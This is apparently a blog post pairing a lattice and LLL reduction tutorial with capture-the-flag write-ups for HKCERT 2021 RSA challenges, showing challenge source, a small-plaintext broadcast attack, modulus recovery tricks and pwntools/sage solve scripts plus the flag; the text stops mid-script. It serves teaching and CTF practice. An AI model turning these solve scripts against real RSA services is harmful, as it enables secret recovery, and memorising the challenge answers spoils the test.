We only study polynomials with integer coefficients, so if the inputs are integers, the outputs are also integers. However, some other polynomials (with rational coefficients) can also give integer outputs. Those polynomials (called integer-valued polynomials), while interesting on their own (see: Hilbert polynomial), are not the focus today. ↩
Howgrave-Graham is one person, not two people named Howgrave and Graham. ↩
Recall a vector space \(V\) over a field (say \(\mathbb{R}\) or \(\mathbb{C}\)) is a set of “vectors”, with the addition of vectors and multiplication of a vector by a scalar, satisfying certain properties. Since we know in linear algebra that every \(n\)-dimensional vector space over \(\mathbb{R}\) is isomorphic to \(\mathbb{R}^n\), let’s focus on the case of \(\mathbb{R}^n\), whose elements can be realized as \(n\)-tuples \((x_1,x_2,\cdots,x_n)\), where the \(x_i\)’s are real numbers.
Definition (Vector Space) A vector space \(V\) over a field \(K\) is an abelian group \((V,+)\) along with a scalar multiplication operator \(\cdot: K\times V\to V\) such that
- \(1\cdot v=v\qquad \forall v\in V\) and \(1\) the multiplicative identity in \(K\)
- \(c\cdot(dv)=(cd)\cdot v\qquad \forall c,d\in K, v\in V\) (Compatibility)
- \((c+d)\cdot v=c\cdot v + d\cdot v\qquad \forall c,d\in K, v\in V\) (Distributive Law 1)
- \(c\cdot (v+w)=c\cdot v + c\cdot w\qquad\forall c\in K, v,w\in V\) (Distributive Law 2)
We will omit the dot for simplicity. Also recall the definition of an abelian group \((V,+)\) is a set \(V\) with a binary operation \(+: V\times V\to V\) such that for every \(a,b,c\in V\),
- \((a+b)+c = a+(b+c)\) (Associativity)
- \(\exists e\in V\) such that \(e+a=a+e=a\). Denote the element by \(0\). (Identity)
- \(\forall a\in V\ \exists d\in V\) such that \(a+d=d+a=e\). Also denote the element by \((-a)\). (Inverse)
- \(a+b=b+a\) (Commutativity)
Theorem A vector space \(V\) of dimension \(n\) over \(K\) is isomorphic to \(K^n\) (as vector spaces).
For \(n=2\), we can just imagine an infinite plane, where vectors are simply an arrow pointing from the origin to some points in the plane. This helps us imagine what lattice looks like in a moment.
For vector spaces, we can talk about the idea of a basis, which is a set of vectors such that, if we multiply each vector by some suitable scalar and add them up, we can generate every vector in the vector space (Spanning set), and such that the zero vector cannot be generated unless all the scalars we choose are 0 (Linearly independent set). For example, the set \(\{(1,0),(0,1)\}\) can generate every vector \((x,y)\) in the \(\mathbb{R}^2\) plane, where \(x,y\) are real numbers, just by doing \(x(1,0)+y(0,1)\).
A standard theorem of linear algebra is that a finite dimensional vector space always has a basis, and that any two bases have the same number of vectors, which is the dimension of the vector space. Also, any basis can be transformed to another basis of the same vector space by taking appropriate linear combinations, such that the coefficients form an invertible matrix.
However, what if we restrict \(x\) and \(y\) to be integers? The set of vectors with integer entries certainly doesn’t form a vector space over \(\mathbb{R}\), because for example \(0.5(1,0)\) is a vector that is not in that set. In this case, we get a Lattice.
There are many equivalent definitions of lattices, but let’s use the simplest one.
Definition (Lattice) Given a basis of \(n\) vectors of real coordinates with \(n\) entries, the lattice generated by that basis is the set of integer linear combinations of the vectors. In other words, let \(\mathcal{B}=\{\vec{v_i}=\,^t(x_{i1},x_{i2},\cdots,x_{in}): 0\lt i\leq n, x_{ij}\in\mathbb{R}\ \forall i,j\}\), then the lattice \(\mathcal{L}\) is given by \(\mathcal{L}=\mathcal{L}(\mathcal B)=\{\sum_i a_i\vec{v_i}: a_i\in\mathbb{Z}\}\). We also write \(\mathcal{B}\) to denote a matrix formed by taking the columns as the basis vectors. So we can write \(\mathcal{B}=\left[\begin{matrix}\vec{v_1}&\vec{v_2}&\cdots&\vec{v_n}\end{matrix}\right]=\left[\begin{matrix}x_{11}&x_{21}&\cdots&x_{n1}\\ x_{12}&x_{22}&\cdots&x_{n2}\\\vdots&\vdots&\ddots\\x_{1n}&x_{2n}&\cdots&x_{nn}\end{matrix}\right]\).
Of course you can also take the row as the basis vectors, then everything described later can still work by transposing all the involved matrices.
For simplicity, we shall work with integer lattices, i.e. the basis vectors have integer entries, or \(\mathcal{L}\subset \mathbb{Z}^n\).
You can visualize lattices with this: Lattice Demonstration
If two bases generate the same lattice \(\mathcal{L}\), then their corresponding matrices are related by multiplication by an integer matrix with determinant \(\pm 1\). Such a matrix is called a unimodular matrix. We shall state this as a theorem (without proof).
Theorem Let \(\mathcal{B}\) and \(\mathcal{C}\) be two bases of some lattices. \(\mathcal{L(B)}=\mathcal{L(C)}\) iff there exists an integer matrix \(U\) such that \(\det U=\pm 1\) and \(\mathcal{B}=\mathcal{C}U\).
In fact, a basis can be transformed to another by elementary column operations, i.e. (1) swapping columns, (2) multiplying a column by \(-1\), and (3) adding an integer multiple of a column to another. It is left as an exercise to the reader to verify that such operations correspond to multiplying the basis matrix by a suitable unimodular matrix.
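As a small numerical illustration (it does not replace the exercise), here is a sketch in plain Python. The basis matrix `B` and the three operations chosen are hypothetical; each elementary column operation is written as right-multiplication by a \(2\times 2\) integer matrix.

```python
def mat_mul(A, B):
    """Multiply two 2x2 integer matrices given as lists of rows."""
    return [[sum(A[i][k] * B[k][j] for k in range(2)) for j in range(2)]
            for i in range(2)]


def det2(M):
    """Determinant of a 2x2 matrix."""
    return M[0][0] * M[1][1] - M[0][1] * M[1][0]


# Hypothetical basis: the columns are the basis vectors (2, 0) and (1, 3).
B = [[2, 1],
     [0, 3]]

swap = [[0, 1], [1, 0]]      # (1) swap the two columns
negate = [[-1, 0], [0, 1]]   # (2) multiply the first column by -1
add = [[1, 3], [0, 1]]       # (3) add 3 times the first column to the second

# Applying the operations one after another is one multiplication by U.
U = mat_mul(mat_mul(swap, negate), add)
C = mat_mul(B, U)

print("U =", U, "det U =", det2(U))
print("C =", C, "|det B| =", abs(det2(B)), "|det C| =", abs(det2(C)))
```

Since `U` has integer entries and determinant \(\pm 1\), its inverse is also an integer matrix, so every column of `B` is an integer combination of the columns of `C` and vice versa.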
Definition The fundamental domain (or the fundamental parallelepiped) of a lattice \(\mathcal{L}(B)\), \(B=\{v_1,\cdots,v_n\}\) is the set \(\mathcal{F}=\{\sum_{i=1}^n c_iv_i: 0\leq c_i < 1\}\).
The \(n\)-dimensional volume (perhaps the Lebesgue measure) of this fundamental parallelepiped is given by \(\text{Vol}(\mathcal{F})=\left\lvert\det B\right\rvert\). The volume is invariant when changing basis, so we can also denote the volume as \(\det \mathcal{L}\).
For any lattice \(\mathcal{L}=\mathcal{L(B)}\), we define the shortest distance of \(\mathcal{L}\) to be the minimum distance between any two different lattice points. Alternatively, it is the length of the shortest (non-zero) vector in the lattice (why?). We denote this quantity by \(\lambda(\mathcal{L})=\inf\limits_{\vec{v}\in\mathcal{L}-\{\vec{0}\}}\vert\vert\vec{v}\vert\vert\), where \(\vert\vert\vec{v}\vert\vert\) here is taken to be the usual Euclidean distance \(\ell_2\). With this quantity defined, we can state the two (hard) lattice problems.
Closest Vector Problem (CVP) Given a vector \(\vec{w}\in \mathbb{R}^n\) that is not in the lattice \(\mathcal{L}\), find a vector \(\vec{v}\in\mathcal{L}\) that is closest to it, i.e. such that \(\vert\vert\vec{v}-\vec{w}\vert\vert\) is minimal.
Shortest Vector Problem (SVP) Given the lattice \(\mathcal{L}\), find \(\vec{v}\in\mathcal{L}\) such that \(\vert\vert\vec{v}\vert\vert=\lambda(\mathcal{L})\).
In a similar vein, we shall define a version of the problem where the solution is not required to be exact, but is instead allowed a certain error.
Approximate Shortest Vector Problem (apprSVP) Let \(\psi(n)\) be a function depending on \(n\) only, and \(\mathcal{L}\) be a lattice of dimension \(n\). The \(\psi(n)\)-apprSVP is to find a non-zero vector \(\vec{v}\in\mathcal{L}\) whose length is at most \(\psi(n)\) times that of the shortest vector, i.e. \(\vert\vert\vec{v}\vert\vert\leq\psi(n)\lambda(\mathcal{L})\).
It is left as exercise to the reader to define the approximate version of CVP (apprCVP).
CVP is known to be an NP-hard problem, while SVP is NP-hard under randomized reductions. However in certain cases (specific lattices for example), the problems may be easier to crack. For example, for \(n=2\), Gauss’s lattice reduction algorithm can completely solve the shortest vector problem.
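For reference, here is a minimal sketch of the two-dimensional reduction for integer lattices. The function name `gauss_reduce` and the example basis are hypothetical; the loop repeatedly makes `v1` the shorter vector and subtracts from `v2` the nearest-integer multiple of `v1`.

```python
def gauss_reduce(v1, v2):
    """Reduce a basis (v1, v2) of a 2-dimensional integer lattice.

    On return, v1 is a shortest non-zero vector of the lattice.
    """
    def dot(a, b):
        return a[0] * b[0] + a[1] * b[1]

    while True:
        # Keep v1 as the shorter of the two vectors.
        if dot(v2, v2) < dot(v1, v1):
            v1, v2 = v2, v1
        num, den = dot(v1, v2), dot(v1, v1)
        # Nearest integer to num/den, computed exactly as floor(num/den + 1/2).
        m = (2 * num + den) // (2 * den)
        if m == 0:
            return v1, v2
        v2 = (v2[0] - m * v1[0], v2[1] - m * v1[1])


# Hypothetical example: a skewed basis of the lattice Z^2 (determinant 1).
a, b = gauss_reduce((5, 8), (8, 13))
print(a, b)
```

The starting basis has determinant \(5\cdot 13-8\cdot 8=1\), so it generates all of \(\mathbb{Z}^2\), and the reduced basis should consist of two vectors of length 1.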
One may want to estimate the distance of the shortest vector in any given lattice. Indeed, there are results that give some approximations.
Theorem(Hermite’s Theorem) For any lattice \(\mathcal{L}\), there exists a non-zero vector \(\vec{v}\in\mathcal{L}\) such that \(\vert\vert\vec{v}\vert\vert\leq \sqrt{n}\det(\mathcal{L})^{\frac 1 n}\).
Definition(Hermite’s Constant) For a given dimension \(n\), define the Hermite constant \(\gamma_n\) to be the smallest value such that every lattice \(\mathcal{L}\) of dimension \(n\) has a non-zero vector \(\vec{v}\in\mathcal{L}\) such that \(\vert\vert\vec{v}\vert\vert^2\leq \gamma_n \det(\mathcal{L})^{\frac 2 n}\). So Hermite’s theorem states that \(\gamma_n\leq n\).
For large \(n\), we know that \(\frac{n}{2\pi e}\leq \gamma_n\leq \frac{n}{\pi e}\). In fact, by the Gaussian heuristic, we expect that for large \(n\) the shortest vector has length approximately \(\sqrt{\frac{n}{2\pi e}}\det(\mathcal{L})^{\frac 1 n}\).
We first introduce the relation between \(\det \mathcal{L}\) and the basis vectors.
Theorem (Hadamard’s Inequality) Let \(B=\{v_1,\cdots,v_n\}\) be the basis of a lattice \(\mathcal{L}(B)\). Then \(\det \mathcal{L}\leq \prod_{i=1}^n \|v_i\|\).
Equality holds iff the basis \(B\) is orthogonal, in other words every pair \(i\neq j\) has \(\langle v_i,v_j\rangle =0\).
Proposition-Definition (Orthogonality Defect) Define the orthogonality defect of a basis \(B\) of lattice \(\mathcal{L}(B)\) to be \(\delta(B)=\frac{\prod_{i=1}^n \|v_i\|}{\det \mathcal{L}}\)
We always have \(\delta(B)\geq 1\) (by Hadamard’s Inequality). We say a basis is non-orthogonal when \(\delta(B)\) is very large.
Theorem Every lattice \(\mathcal{L}\) of dimension \(n\) has a basis \(B\) of \(\mathcal{L}\) such that \(\delta(B)\leq n^{\frac n 2}\)
If the basis is orthogonal, then note that if \(c_i\in\mathbb{Z}\), \(\|c_1v_1+\cdots+c_nv_n\|^2= c_1^2 \|v_1\|^2+\cdots+c_n^2 \|v_n\|^2\), so the shortest vector in \(\mathcal{L}\) is just the shortest vector in \(B\). On the other hand, for \(w\in \mathbb{R}^n-\mathcal{L}\), write \(w=t_1v_1+\cdots +t_nv_n\) (\(t_i\in \mathbb{R}\)), then for \(v=\sum_{i=1}^n c_iv_i\in\mathcal{L}\), \(\|v-w\|^2=\sum_{i=1}^n (t_i-c_i)^2 \|v_i\|^2\). So CVP can be trivially solved by taking \(c_i\) to be the integer closest to \(t_i\).
Doing the same trick for nearly-orthogonal bases (i.e. \(\delta(B)\) is close to 1) is known as Babai’s Algorithm.
For highly non-orthogonal bases, this trick will not work. While Babai’s algorithm is simple, it is actually quite hard to analyze when it will work or fail. We shall see better methods for solving apprSVP and apprCVP soon.
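The rounding trick can be sketched in a few lines for dimension 2. Everything below is an illustrative assumption (the function name `babai_round_2d`, the two bases and the target `w`): the same lattice is given once by a nearly orthogonal basis and once by a skewed basis, and the coordinates \(t_i\) are computed exactly with Cramer’s rule.

```python
from fractions import Fraction


def babai_round_2d(v1, v2, w):
    """Write w = t1*v1 + t2*v2 over the rationals and round t1, t2."""
    det = v1[0] * v2[1] - v1[1] * v2[0]
    # Cramer's rule for the real coordinates of w in the basis (v1, v2).
    t1 = Fraction(w[0] * v2[1] - w[1] * v2[0], det)
    t2 = Fraction(v1[0] * w[1] - v1[1] * w[0], det)
    c1, c2 = round(t1), round(t2)
    return (c1 * v1[0] + c2 * v2[0], c1 * v1[1] + c2 * v2[1])


def dist_sq(a, b):
    """Squared Euclidean distance between two points."""
    return (a[0] - b[0]) ** 2 + (a[1] - b[1]) ** 2


# Hypothetical "good" basis of a lattice with determinant 13.
good = ((4, 1), (-1, 3))
# A "bad" basis of the same lattice: g1 + 5*g2 and 2*g1 + 11*g2.
bad = ((-1, 16), (-3, 35))

w = (6, 5)  # target point, not in the lattice
near_good = babai_round_2d(*good, w)
near_bad = babai_round_2d(*bad, w)
print("good basis:", near_good, "squared distance", dist_sq(near_good, w))
print("bad basis: ", near_bad, "squared distance", dist_sq(near_bad, w))
```

Both outputs are lattice points, but the one obtained from the skewed basis is much further from `w`, which is the failure described above.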
One idea to remedy the above problem is to transform the basis into a relatively orthogonal basis.
Definition (LLL-Reduced) Let \(\delta=\frac{3}{4}\) and \(\|\cdot\|\) be the standard Euclidean norm.
Let \(B=\{v_1,\cdots,v_n\}\) be a basis of lattice \(\mathcal{L}\) and \(B^*=\{v_1^*,\cdots,v_n^*\}\) be the orthogonal basis of \(\mathbb{R}^n\) (not of \(\mathcal{L}\) in general) after applying the Gram-Schmidt process, with Gram-Schmidt coefficients \(\mu_{i,j}=\frac{\langle v_i,v_j^*\rangle}{\|v_j^*\|^2}\). Then we say \(B\) is LLL-reduced if
- \(\lvert\mu_{i,j}\rvert\leq\frac{1}{2}\) for all \(1\leq j<i\leq n\) (Size-reduced)
- \(\delta\|v_{k-1}^*\|^2\leq \|v_k^*\|^2 + \mu_{k,k-1}^2\|v_{k-1}^*\|^2\) for all \(1<k\leq n\) (Lovász condition)
The Lovász condition can also be expressed as \(\|v_k^*\|^2\geq (\delta - \mu_{k,k-1}^2)\|v_{k-1}^*\|^2\).
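The two conditions can be checked mechanically. The sketch below is only a checker, not the LLL algorithm itself; it assumes the usual Gram-Schmidt coefficients \(\mu_{i,j}=\langle v_i,v_j^*\rangle/\|v_j^*\|^2\), takes the basis vectors as rows, and uses exact rational arithmetic. The function names and test bases are hypothetical.

```python
from fractions import Fraction


def dot(a, b):
    """Inner product of two vectors of equal length."""
    return sum(x * y for x, y in zip(a, b))


def gram_schmidt(basis):
    """Return (orthogonal vectors v_i^*, coefficients mu[i][j] for j < i)."""
    ortho, mu = [], []
    for i, v in enumerate(basis):
        w = [Fraction(x) for x in v]
        row = []
        for j in range(i):
            m = dot(v, ortho[j]) / dot(ortho[j], ortho[j])
            row.append(m)
            w = [wi - m * oj for wi, oj in zip(w, ortho[j])]
        ortho.append(w)
        mu.append(row)
    return ortho, mu


def is_lll_reduced(basis, delta=Fraction(3, 4)):
    """Check the size-reduced and Lovász conditions for a basis."""
    ortho, mu = gram_schmidt(basis)
    size_reduced = all(abs(m) <= Fraction(1, 2) for row in mu for m in row)
    lovasz = all(
        dot(ortho[k], ortho[k])
        >= (delta - mu[k][k - 1] ** 2) * dot(ortho[k - 1], ortho[k - 1])
        for k in range(1, len(basis))
    )
    return size_reduced and lovasz


print(is_lll_reduced([(1, 0), (0, 1)]))    # orthonormal basis of Z^2
print(is_lll_reduced([(5, 8), (8, 13)]))   # skewed basis of the same lattice
```

The second basis fails already at the size-reduced condition, since \(\mu_{2,1}=144/89>\frac12\).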
Theorem If a basis \(B=\{v_1,\cdots,v_n\}\) of lattice \(\mathcal{L}\) is LLL-reduced, then
- \[\prod_{i=1}^n\|v_i\|\leq 2^{\frac{n(n-1)}{4}}\det\mathcal{L}\]
- \[\|v_j\|\leq 2^{\frac{i-1}{2}}\|v_i^*\|\text{ for all }1\leq j\leq i\leq n\]
- \[\|v_1\|\leq 2^{\frac{n-1}{4}}(\det\mathcal{L})^{\frac{1}{n}}\]
- \[\|v_1\|\leq 2^{\frac{n-1}{2}}\lambda(\mathcal{L})\]
The fourth assertion implies that an LLL-reduced basis gives a solution to the \(2^{\frac{n-1}{2}}-\)apprSVP.
On the other hand, given an LLL-reduced basis \(B\) of lattice \(\mathcal{L}\), we can solve the \(C^n-\)apprCVP for some constant \(C\) by directly applying Babai’s Algorithm on the LLL-reduced basis.
While the exact algorithm to find an LLL-reduced basis will not be described here, we state the following theorem:
Theorem Given a basis \(B\) of lattice \(\mathcal{L}\subset \mathbb{Z}^n\), an LLL-reduced basis can be found in time polynomial in \(n\) and \(\log\max\limits_{v_i\in B}\|v_i\|\).
One important note is that empirically, the LLL algorithm gives much better results than it guarantees in theory.
Hoffstein, J., Pipher, J., & Silverman, J. H. (2008). An introduction to mathematical cryptography (Vol. 1). New York: Springer.
]]>Challenge Files:
import os
import random
from Crypto.Cipher import AES
from Crypto.Util.number import isPrime as is_prime
from Crypto.Util.Padding import pad

# 256 bits for random-number generator
N = 0xcdc21452d0d82fbce447a874969ebb70bcc41a2199fbe74a2958d0d280000001
G = 0x5191654c7d85905266b0a88aea88f94172292944674b97630853f919eeb1a070
H = 0x7468657365206e756d6265727320617265206f6620636f757273652073757321

# More challenge-specific parameters
E = 17 # The public modulus
CALLS = 17 # The number of operations allowed

# Generate a 512-bit prime
def generate_prime(seed):
    random.seed(seed)
    while True:
        p = random.getrandbits(512) | (1<<511)
        if p % E == 1: continue
        if not is_prime(p): continue
        return p

# Defines a 1024-bit RSA key
class Key:
    def __init__(self, p, q):
        self.p = p
        self.q = q
        self.n = p*q
        self.e = E
        phi = (p-1) * (q-1)
        self.d = pow(self.e, -1, phi)

    def encrypt(self, m):
        return pow(m, self.e, self.n)

    def decrypt(self, c):
        return pow(c, self.d, self.n)

# Defines an user
class User:
    def __init__(self, master_secret):
        self.master_secret = master_secret
        self.key = None

    def generate_key(self):
        id = random.getrandbits(256)
        self.key = Key(
            generate_prime(self.master_secret + int.to_bytes(pow(G, id, N), 32, 'big')),
            generate_prime(self.master_secret + int.to_bytes(pow(H, id, N), 32, 'big'))
        )

    def send(self, m):
        if self.key is None: raise Exception('no key is defined!')
        m = int(m, 16)
        print(hex(self.key.encrypt(m)))

    def get_secret(self):
        if self.key is None: raise Exception('no key is defined!')
        m = int.from_bytes(self.master_secret, 'big')
        print(hex(self.key.encrypt(m)))

def main():
    flag = os.environ.get('FLAG', 'hkcert21{***REDACTED***}')
    flag = pad(flag.encode(), 16)
    master_secret = os.urandom(32)
    admin = User(master_secret)
    for _ in range(CALLS):
        command = input('[cmd] ').split(' ')
        try:
            if command[0] == 'send':
                # Encrypts a hexed message
                admin.send(command[1])
            elif command[0] == 'pkey':
                # Refreshs a new set of key
                admin.generate_key()
            elif command[0] == 'backup':
                # Gets the encrypted master secret
                admin.get_secret()
            elif command[0] == 'flag':
                cipher = AES.new(master_secret, AES.MODE_CBC, b'\0'*16)
                encrypted_flag = cipher.encrypt(flag)
                print(encrypted_flag.hex())
        except Exception as err:
            raise err
            print('nope')

if __name__ == '__main__':
    main()

'''
Side-note: I knew this is _very_ similar to "Calm Down" in HKCERT CTF 2020, but rest assured that this is a different challenge.
https://github.com/samueltangz/ctf-archive-created/blob/master/20201006-hkcert-ctf/calm-down/env/chall.py
'''
To summarize the challenge, we have the flag that is encrypted with a 32-byte AES key master_secret. We can access the master_secret encrypted with a “random” (will get to that in Braceless) 1024-bit RSA key. The RSA key can be updated to another random key, but you are not given the public modulus \(n\) (the public exponent is \(e=17\)). You can also ask the service to encrypt arbitrary integers (and get the result). You can only send 17 queries to the server in a session.
Theorem: Suppose \(n_1,\cdots,n_k\) are pairwise coprime \((\gcd(n_i,n_j)=1\) \(\forall i \neq j)\), then the system of congruence equations
\[\begin{cases} x\equiv a_1\pmod{n_1}\\ x\equiv a_2\pmod{n_2}\\ \vdots\\ x\equiv a_k\pmod{n_k}\\ \end{cases}\]has a unique solution \(x^{*}\) mod \(n_1n_2\cdots n_k\).
Suppose a plaintext \(m\) is encrypted \(k\) times under pairwise coprime moduli \(n_1,\cdots,n_k\) (with \(m<n_i\) for each \(i\)), where all the public exponents \(e\) are the same and \(k\geq e\), i.e. the following holds:
\[\begin{cases} m^e\equiv a_1\pmod{n_1}\\ m^e\equiv a_2\pmod{n_2}\\ \vdots\\ m^e\equiv a_k\pmod{n_k}\\ \end{cases}\]
Then by the Chinese Remainder Theorem, we get \(x^{*}\) mod \(n_1n_2\cdots n_k\) that satisfies all the equations above. So \(x^{*}\equiv a_i\pmod{n_i}\) for any \(i\), and at the same time \(m^e\equiv a_i\pmod{n_i}\).
But \(m^e=\underbrace{m\cdot m\cdots m}_{e}\leq \underbrace{m\cdot m\cdots m}_{k} <n_1\cdot n_2\cdots n_k\), so \(x^{*}=m^e\) (without mod), since the solution is unique mod \(n_1\cdots n_k\). So we get \(m=\sqrt[e]{x^{*}}\) just by taking the usual \(e\)-th root of \(x^*\).
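To make the argument concrete, here is a minimal sketch of the broadcast attack on toy numbers. All values are hypothetical (\(e=3\), three small pairwise coprime moduli, \(m=100\)), and the helper names `crt` and `integer_root` are not from the challenge; `pow(x, -1, n)` needs Python 3.8 or newer.

```python
from math import prod


def crt(residues, moduli):
    """Solve x = a_i (mod n_i) for pairwise coprime n_i; returns x mod prod(n_i)."""
    total = prod(moduli)
    x = 0
    for a, n in zip(residues, moduli):
        partial = total // n
        x += a * partial * pow(partial, -1, n)
    return x % total


def integer_root(x, e):
    """Largest integer r with r**e <= x, found by binary search."""
    lo, hi = 0, 1
    while hi ** e <= x:
        hi *= 2
    # Invariant: lo**e <= x < hi**e
    while hi - lo > 1:
        mid = (lo + hi) // 2
        if mid ** e <= x:
            lo = mid
        else:
            hi = mid
    return lo


e = 3
moduli = [11 * 13, 17 * 19, 23 * 29]   # toy, pairwise coprime
m = 100                                # the "secret", smaller than every modulus
ciphertexts = [pow(m, e, n) for n in moduli]

x_star = crt(ciphertexts, moduli)      # equals m**e because m**e < n1*n2*n3
recovered = integer_root(x_star, e)
print(recovered)
```

The attacker only uses `ciphertexts` and `moduli`; no private key is involved at any point.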
The setting is like so:
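There is an unknown number of things. Counted in threes, two are left over; counted in fives, three are left over; counted in sevens, two are left over. How many things are there?
Let’s translate that to maths:
\[\begin{cases} x\equiv 2\pmod{3}\\ x\equiv 3\pmod{5}\\ x\equiv 2\pmod{7}\\ \end{cases}\]
What is the value of \(x\)?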
By Chinese remainder theorem, we know that the solution is \(x\equiv 23\pmod{105}\). If we further assume that \(0\leq x < 105\), then we can immediately deduce that \(x=23\) (without the mod).
If there is no such assumption, then note that any \(x = 23 + 105k\) (\(k\) any integer) would satisfy the equations, so you do not have a unique solution.
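The claim is small enough to confirm by brute force. The following sketch simply tries every candidate; the helper name `satisfies` is hypothetical, and the remainders 2, 3, 2 for the moduli 3, 5, 7 are the ones from the puzzle.

```python
def satisfies(x):
    """The three remainder conditions of the puzzle."""
    return x % 3 == 2 and x % 5 == 3 and x % 7 == 2


# Exactly one solution in a full period of length 3 * 5 * 7 = 105.
in_one_period = [x for x in range(105) if satisfies(x)]
print(in_one_period)

# Without the bound, the solutions repeat every 105.
further = [x for x in range(105, 500) if satisfies(x)]
print(further)
```

This is the same uniqueness-up-to-the-modulus property that the broadcast attack relies on.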
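Here are the operations that we can do (we can make a total of 17 operations):
- send: encrypt a hex-encoded integer of our choice with the current RSA key
- pkey: replace the current RSA key with a newly generated one
- backup: get master_secret encrypted with the current RSA key
- flag: get the flag encrypted with AES under master_secret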
So the goal is to try to obtain the AES key in order to decrypt the flag.
So the first idea is maybe to launch a broadcast attack, since \(e=17\) is small. However, we have a lot of obstacles ahead of us.
Note that we can send -1 to encrypt. Since \(e\) is odd (Why?) and \(-1\equiv n-1\pmod{n}\), encrypting -1 will yield
\[E_k(-1)=(-1)^e \bmod n=n-1\]So we can send -1 to obtain the public modulus every time we change keys!
We need 1 operation for flag; then each ciphertext-modulus pair costs 3 operations: 1 for pkey, 1 to send -1 and 1 for backup. So we can only have 5 ciphertext-modulus pairs (\(3\cdot 5 + 1 = 16\) operations already).
Now the secret \(m\) (the master_secret) is 32 bytes in length, and each RSA key uses a public modulus of about 1024 bits, which is at least \(2^{511\cdot 2}=2^{1022}\).
This means that \(m < 2^{256}\), so \(m^{17} < 2^{256\cdot 17} = 2^{4352} < 2^{5110} = 2^{1022\cdot 5} \leq n_1n_2\cdots n_5\). So we really only need 5 ciphertext-modulus pairs (instead of 17)! This is because the usual broadcast attack only assumes that \(m\) is less than each \(n_i\), but our plaintext in this case is much smaller than the moduli, so we do not need as many equations.
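This is easy to reproduce locally. The sketch below uses a hypothetical toy modulus (\(61\cdot 53\)) instead of a real 1024-bit key, and mirrors what the service does with the input: `int("-1", 16)` parses to \(-1\), and Python’s three-argument `pow` returns a non-negative residue.

```python
# Hypothetical toy key; the real service uses two 512-bit primes.
p, q, e = 61, 53, 17
n = p * q

m = int("-1", 16)          # the service parses our input as a hex integer
ciphertext = pow(m, e, n)  # what the service would print (in hex)

recovered_n = ciphertext + 1
print(m, ciphertext, recovered_n == n)
```

With an even exponent the ciphertext would be 1 and reveal nothing about \(n\).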
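The count can be double-checked with exponent arithmetic alone. In this sketch the function name `pairs_needed` is hypothetical; the inputs are the bounds used above (\(m<2^{256}\), every modulus at least \(2^{1022}\), \(e=17\)).

```python
def pairs_needed(e, m_bits, n_min_bits):
    """Smallest k with 2^(m_bits*e) <= 2^(n_min_bits*k).

    Since m < 2^m_bits and every n_i >= 2^n_min_bits, this k guarantees
    m^e < n_1 * ... * n_k, which is all the CRT argument needs.
    """
    k = 1
    while m_bits * e > n_min_bits * k:
        k += 1
    return k


k = pairs_needed(e=17, m_bits=256, n_min_bits=1022)
operations = 1 + 3 * k   # one "flag" call plus (pkey, send -1, backup) per pair
print(k, operations)
```

So the attack fits within the 17 allowed calls with one call to spare.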
We use python with pwntools to aid the attack.
from pwn import *

debug = True
E = 17
if debug:
    r = process(['python3', 'long_story_short.py'])
else:
    server = "chalp.hkcert21.pwnable.hk"
    port = 28157
    r = remote(server, port)

def get_flag():
    r.recvuntil(b'[cmd] ')
    r.sendline(b'flag')
    return int(r.recvline().decode().strip(),16)

def pkey():
    r.recvuntil(b'[cmd] ')
    r.sendline(b'pkey')

def send(msg):
    r.recvuntil(b'[cmd] ')
    r.sendline(b'send ' + msg)
    return int(r.recvline().decode().strip(), 16)

def backup():
    r.recvuntil(b'[cmd] ')
    r.sendline(b'backup')
    return int(r.recvline().decode().strip(), 16)

def round():
    pkey()
    _n = send(b"-1")
    enc = backup()
    n = _n + 1
    return n, enc

enc_flag = get_flag()
N = []
ENC = []
for _ in range(5):
    n, enc = round()
    N.append(n)
    ENC.append(enc)
print(enc_flag)
print("enc =", ENC)
print("N =", N)
This is the extraction of the ciphertext-modulus pair and the encrypted flag.
Then we feed the pairs into sage for the Chinese Remainder Theorem. We just need to take the 17-th root of the result to obtain the AES key.
enc = [...]
N = [...]
sol = CRT_list(enc, N)
secret = sol.nth_root(17)
print(int(secret).to_bytes(32, "big"))
Finally, we just decrypt to get the flag.
from Crypto.Cipher import AES
enc = ...
secret = ...
cipher = AES.new(secret, AES.MODE_CBC, b'\0'*16)
dec = cipher.decrypt(enc)
print(dec)
flag: hkcert21{y0u_d0nt_n33d_e_m3ss4g3s_f0r_br0adc4s7_4t7ack_wh3n_m_i5_sm41l}
The Python file is basically the same as the one in Long Story Short, except that we are not the ones who interact with the server. Instead, we are given a transcript.log that records a session.
13,14c13,14
< E = 65537 # The public modulus
< CALLS = 65537 # The number of operations allowed
---
> E = 17 # The public modulus
> CALLS = 17 # The number of operations allowed
99,100c99,100
< Side-note: I knew this is _very_ similar to "Long Story Short" in HKCERT CTF 2021, but rest assured that this is a different challenge.
< ...:)
---
> Side-note: I knew this is _very_ similar to "Calm Down" in HKCERT CTF 2020, but rest assured that this is a different challenge.
> https://github.com/samueltangz/ctf-archive-created/blob/master/20201006-hkcert-ctf/calm-down/env/chall.py
The session first gets the encrypted flag, then repeats “send 2, send 3 and backup” 16384 times.
First, we still do not have the modulus \(n\). However, we have the encryptions of 2 and 3. Note that \[\begin{align*} 2^{e} - (2^e \bmod n) =& an\\ 3^{e} - (3^e \bmod n) =& bn\\ \end{align*}\]for some positive integers \(a\) and \(b\). We already know the left hand side of both equations. To obtain \(n\), we simply take the gcd of the two values; the result will be \(cn\), where \(c\) is some small integer. We can just perform trial division to get rid of the small factors.
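Here is a self-contained sketch of this recovery on a key we control. Everything in it is an assumption for illustration: the modulus is built from the two Mersenne primes \(2^{61}-1\) and \(2^{89}-1\), the function name `recover_modulus` is hypothetical, and the small factors are stripped with a `while` loop over all integers below a bound, which is a slightly more thorough variant of the trial division used in this write-up.

```python
from math import gcd


def recover_modulus(e, enc_2, enc_3, bound=1000):
    """Recover a candidate for n from enc_2 = 2^e mod n and enc_3 = 3^e mod n."""
    # Both differences are multiples of n, so their gcd is c*n for some c.
    g = gcd(pow(2, e) - enc_2, pow(3, e) - enc_3)
    # Strip small factors of c (assumes n itself has no factor below bound).
    for small in range(2, bound):
        while g % small == 0:
            g //= small
    return g


# Toy key, for illustration only.
p, q = 2**61 - 1, 2**89 - 1
n = p * q
e = 65537

candidate = recover_modulus(e, pow(2, e, n), pow(3, e, n))
print(candidate % n == 0, candidate.bit_length(), n.bit_length())
```

The candidate is always a multiple of \(n\); it equals \(n\) exactly unless the leftover cofactor \(c\) happens to contain a prime above the bound, which is unlikely but not impossible.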
The code for recovering the modulus and the (RSA) encryption of the master secret:
from math import gcd

e = 65537
N = []
BACKUP = []
e2 = pow(2,e)
e3 = pow(3,e)
with open("transcript.log", "r") as f:
    f.readline()
    flag = int(f.readline(), 16)
    try:
